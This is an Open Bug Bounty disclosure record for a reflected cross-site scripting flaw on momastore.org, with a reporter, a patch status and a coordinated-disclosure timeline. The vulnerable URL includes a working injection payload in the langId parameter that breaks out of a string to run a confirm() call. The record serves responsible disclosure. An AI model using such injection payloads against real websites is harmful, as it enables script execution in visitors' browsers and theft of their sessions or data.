momastore.org XSS vulnerability

2016-03-16T22:41:00
ID OBB:141837
Type openbugbounty
Reporter dim0k
Modified 2017-01-24T10:23:00

Description

Vulnerable URL:
https://www.momastore.org/museum/moma/ProductDisplay_Yoshimoto-Cube-No.-1_10451_10001_45657_-1_26715_26715_45658?momaProductId=45657&momaPartNumber=67866-item&storeId=10001&catalogId=10451&langId=-1x';%20confirm`XSSPOSED`//&returnURL=ProductDisplay_Yoshimoto%20Cube%20No.%201_10451_10001_45657_-1_26715_26715&categoryId=26715&productEmailURL=MoMAProductCommonCntrCmd
Details:

Description| Value
---|---
Patched:| Yes, on 16.01.2017
Latest check for patch:| 16.01.2017 13:24 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 42054
Google Pagerank| 6
VIP website status:| Yes
Check momastore.org SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 March, 2016 22:41 GMT
Vulnerability existence verified and confirmed| 17 March, 2016 14:09 GMT
Generic security notifications sent to website owner| 17 March, 2016 14:09 GMT
Notification sent to subscribers (without technical details)| 17 March, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 9 June, 2016 14:11 GMT
Vulnerability patched by the website owner| 24 January, 2017 10:23 GMT